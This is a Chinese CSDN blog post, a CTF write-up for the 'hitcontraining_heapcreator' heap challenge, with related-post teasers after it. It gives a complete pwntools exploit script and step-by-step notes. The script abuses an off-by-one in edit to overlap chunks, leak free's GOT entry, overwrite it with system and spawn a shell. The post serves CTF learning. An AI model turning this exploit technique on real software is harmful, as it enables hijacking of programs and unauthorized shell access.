[off by one] hitcontraining_heapcreator

最新推荐文章于 2024-01-17 22:27:12 发布
最新推荐文章于 2024-01-17 22:27:12 发布
阅读量355 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzai9527/article/details/115370291
版权
CTF 同时被 2 个专栏收录
43 篇文章 0 订阅
订阅专栏
HEAP
17 篇文章 0 订阅
订阅专栏

[off by one] hitcontraining_heapcreator

本题主要看懂,edit中的off by one, 知道off by one 还需要知道程序的大概结构体

在这里插入图片描述

在这里插入图片描述

从内存情况推测结构体

  • 每次申请空间,会创建2个chunk,其中一个固定为下面结构体形式,另一个根据大小分配
struct test{
	int size;
    char *content;
}

exp

from pwn import *
#p = remote('node3.buuoj.cn',27554)
p = process('./heapcreator')
context.log_level = 'debug'

def alloc(size,content):
	p.sendlineafter('Your choice :',str(1))
	p.sendlineafter('Size of Heap : ',str(size))
	p.sendlineafter('Content of heap:',content)

def edit(index,content):
	p.sendlineafter('Your choice :',str(2))
	p.sendlineafter('Index :',str(index))
	p.sendlineafter('Content of heap : ',content)

def show(index):
	p.sendlineafter('Your choice :',str(3))
	p.sendlineafter('Index :',str(index))

def dele(index):
	p.sendlineafter('Your choice :',str(4))
	p.sendlineafter('Index :',str(index))

alloc(0x18,'bbbb')
alloc(0x10,'aaaa')
gdb.attach(p)
pause()
elf = ELF('./heapcreator')
libc = ELF('./libc.so.6')
edit(0,'/bin/sh\x00'+'b'*0x10 +'\x41')
pause()
dele(1)
pause()
alloc(0x30,p64(0)*4+p64(0x30)+p64(elf.got['free']))
show(1)
free = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
log.success('free==>'+str(hex(free)))
libc_base = free - libc.sym['free']
system = libc_base + libc.sym['system']
log.success('system==>'+str(hex(system)))
edit(1,p64(system))
dele(0)
#gdb.attach(p)
p.interactive()

step1 申请两个chunk(实际会有四个)

在这里插入图片描述

step2 通过off by one 修改chunk1 的 head为0x41,chunk0的content为’/bin/sh‘

在这里插入图片描述

step3 释放chunk1,此时会有两个fastbin,看清楚0x20的bin在下面的位置

在这里插入图片描述

step4 重新申请一个content大小为0x30的chunk,此时先前的0x20将会作为结构体chunk,包含内容指针,且指针的值可以通过content修改

在这里插入图片描述

step5 泄露free got地址,计算libc_base

在这里插入图片描述

step6 通过content指针修改free got的值为system

在这里插入图片描述

step7 释放chunk0,即可触发system(’/bin/sh’)

huzai9527
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
lesson one_OneLesson_off转ply_python.off转.ply_
10-02
标题中的"lesson one_OneLesson_off转ply_python.off转.ply_"表明这是一个关于将OFF格式的3D模型文件转换为PLY格式的教程的第一课。OFF(Object File Format)和PLY(Polygon File Format)都是用于存储三维几何数据...
IAR调试,出现关于启动文件的Error[41]: Bad label,Bad Instruction,报三个错误的解决办法
weixin_52164757的博客
08-09 2724
1,这是因为修改了.s启动文件的格式,即使没修改,删除了空格会这样报错的,所以最好的解决办法是:IAR工程中remove掉这个启动文件,把原来的启动文件删掉,重新移植一个相同的启动文件过来,再重新在CMSIS文件夹下面Add启动文件,编译即可通过了。 2,一开始我也搞不清楚是哪里出错了,好像没修改过启动文件啊,为什么一直都是这里报错,最后才想到干脆重新换个新的启动文件(或许是自己不小心修改了哪里,自己不知道而已),最后真的编译成功了。希望能帮助大家,谢谢 ...
C语言栈溢出 重定向返回地址 执行shellcode学习
顺炸天
12-31 574
REF: https://www.youtube.com/watch?v=1S0aBV-Waeo- 栈结构 https://dl.packetstormsecurity.net/papers/attack/64bit-overflow.pdf- 64位linux 动手实现buffer overflow http://www.cppblog.com/baby-fly/archive/2010/07/27/121395.html- gdb debug 实验环境 Linux kali(201...
hitcontraining_heapcreator
m0sway的博客
01-07 2867
hitcontraining_heapcreator 使用checksec查看: 开启了Canary和栈不可执行,没有开启PIE。 先运行一下看看: 看到菜单,堆题,放进IDA中查看: 分布来查看,首先是create_heap(): heaparray[i] = malloc(0x10uLL):创建用户所需chunk前程序会先创建一个0x10大小的chunk v0[1] = malloc(size);:程序所创建的chunk中存放了用户所创的chunk的地址 edit_heap(): rea
BUUCTF--hitcontraining_heapcreator1
qq_30528603的博客
01-05 413
此时往chunk3这个用户堆写数据,将会写入free_got表里,这样我们可以将伪造的system的地址写入free_got表,一旦调用free,将会去执行system。2.接着修改chunk0的内容填入bin/sh作为后续system的参数,利用off-by-one并修改下一个索引chunk的大小为0x81(覆盖的是chunk1的索引堆)。这句其实可以这样解读read(0,对应索引堆里的那个堆地址,Size),现在他将变成这样read(0,&free_got,Size)。以此来达到我们的目的。
读取off文件.zip_OFF_off文件_off读取_读取off
09-23
OFF文件是一种三维模型格式,主要用于计算机图形学领域。它通常包含几何对象的顶点、边和面信息,用于表示3D形状。这种文件格式相对简单,易于解析,因此在教学和研究中比较常见。本篇文章将详细介绍如何读取和运行...
处理off.rar_.off文件_OFF_matlab 处理 off_matlab导入wrp_读取off
07-14
标题中的“处理off.rar_.off文件_OFF_matlab 处理_off_matlab导入wrp_读取off”表明我们将讨论如何在MATLAB环境中处理`.off`文件,包括导入、读取以及可能的处理操作。MATLAB是一个强大的数学计算和数据分析环境,它...
off_chain_data_off-chain数据库_HyperledgerFabric_fabric_hyperledger
10-02
了解如何使用基于对等通道的事件服务来构建用于报告和分析的脱链数据库。
2ASK.zip_2ask_On Off Keying_ask_matlab_ook
07-14
ASK即“幅移键控”又称为“振幅键控”,也有称为“开关键控”(通断键控)的,所以又记作OOK信号。ASK是一种相对简单的调制方式。幅移键控(ASK)相当于模拟信号中的调幅,只不过与载频信号相乘的是二进制数码而已。...
[BUUCTF]-PWN:hitcontraining_heapcreator解析(off by one)
最新发布
2301_79326813的博客
01-17 593
又是一道堆题,先看一下保护Partial RELRO说明got表可被修改,而且还没开pie,直接看ida这里就不过多解释了,把比较重要的说一下。首先是这个edit,它限制了填充字节,只能比我们申请的大小多1个字节。还有创建堆块的函数,他在创建我们申请的堆块前还申请了一个大小为0x10的堆块。在动态调试中可以发现,这个堆块还存储了与填充字节数有关的字节数,而且还和heaparray一样存储了指向与他一同创建的堆块的指针。
BUUCTF-PWN刷题记录-3
weixin_44145820的博客
03-31 847
目录hitcontraining_heapcreator hitcontraining_heapcreator 考虑修改GOT表 在edit函数中可以溢出一个byte 这题需要利用堆重叠的方法,因为free之后会置空,只能利用堆重叠进行重复分配 利用思路如下: 先申请三个heap,其中heap[0]的内容大小为8的奇数倍 使用edit溢出修改heap[1]的chunk的size,把heap[...
buuctf (pwnable_start)(babyfengshui_33c3_2016)(gyctf_2020_borrowstack)(ciscn_2019)(hitcontraining_h)
cainiao78777的博客
05-17 153
可以通过先申请几个小堆块chunnk0,1,2,3,再利用off by one漏洞用0修改1的大小,把2和一造成重叠,然后再申请回来,通过1把2的存储堆块指针的地方修改为free的got表地址,这样就能dump出来泄露libc,然后计算system,再修改free的got为system函数地址,然后free3就能getshell了。存储字符的时候,三个4字节大小的部分分别是printf的地址(相当于dump)free堆块的操作地址,存储字符的堆块的地址。
buuctf hitcontraining_heapcreator HITCON Trainging lab13
weixin_45677731的博客
08-10 1015
这一题在wiki上面是有的,在Chunk Extend and Overlapping里面,个人觉得这一题对于我这种刚开始学习堆的人来说,是比较容易理解的一题 拖进IDA create_heap函数: 值得注意的是,他这里是会有两次malloc的,也就是说,你申请了一次,他就会创建两个chunk,第一个chunk是0x20大小的,可以看作是记录的作用,里面存放着第二个chunk的size和指针,同时,第一个chunk的地址指针保存在bss段中,heaparray数组这里: 这样表述起来可能不太清晰,我申
header 之前有输入会导致错误的原因
imsuperman1015的专栏
09-15 1779
一直只知道不能有输出,具体理由还不知道。今天明白了。    由于 目前对 http 协议不是很清楚,所以不能具体说明。   例子:test.php echo 'test'; header('content-type:text/html;charset=utf-8'); 上面的代码 在 php.ini 中 output_buffering=Off 的时候会导致一个错误(关闭php
win7 安装.Net framework 4.0出现 安装不成功,错误代码0x80240037 的解决方法
热门推荐
小白裸奔
08-11 43万+
1.安装说明 系统:win7 64位 安装包:dotNetFx40_Full_x86_x64.exe(.Net framework 4.0) 出现的问题:在win7 上安装dotNetFx40_Full_x86_x64.exe之后,弹出说明框:.Net framework 4安装未成功,原因是hresult 0x80240037 后面也采用了各种方法,还发现这种错误:你的电脑使用此 Win
imgs[:, :, h_off:(h_off + crop_size), w_off:(w_off + crop_size)]是什么意思
04-11
这句话是在对一个三维数组的切片操作,其中imgs是一个三维数组,h_off、w_off和crop_size是切片操作的参数。初始数组大小为[height, width, channels],切下来的部分大小为[crop_size, crop_size, channels]。h_off表示沿着高度方向上的偏移量,w_off表示沿着宽度方向的偏移量,因此[h_off:(h_off+crop_size), w_off:(w_off+crop_size)]表示在原始的数组中,沿着高度方向切下从h_off开始,长度为crop_size的部分,沿着宽度方向切下从w_off开始,长度为crop_size的部分。而[:, :, h_off:(h_off+crop_size), w_off:(w_off+crop_size)]则表示在这个三维数组的每个通道上都做一次这样的切片操作,因此最终得到的数组大小为[channels, crop_size, crop_size]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值